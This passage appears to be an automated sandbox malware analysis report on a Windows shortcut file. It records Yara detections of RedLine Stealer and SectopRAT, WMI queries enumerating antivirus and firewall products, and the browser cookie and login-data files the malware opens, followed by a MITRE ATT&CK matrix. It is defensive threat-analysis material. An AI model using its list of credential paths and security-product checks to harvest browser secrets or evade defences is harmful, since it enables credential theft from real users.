Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5204, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Source: AutoIt3.exe	Binary or memory string: WIN_81
Source: AutoIt3.exe	Binary or memory string: WIN_XP
Source: AutoIt3.exe	Binary or memory string: WIN_XPe
Source: AutoIt3.exe	Binary or memory string: WIN_VISTA
Source: AutoIt3.exe	Binary or memory string: WIN_7
Source: AutoIt3.exe	Binary or memory string: WIN_8
Source: AutoIt3.exe, 00000021.00000003.1944653433.0000000005BB6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.AutoIt3.exe.5dc5d6c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5204, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C2696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	27_2_00C2696E
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C26E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	27_2_00C26E32
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003B696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	29_2_003B696E
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003B6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	29_2_003B6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	169 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fsg5PWtTm2.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
fsg5PWtTm2.lnk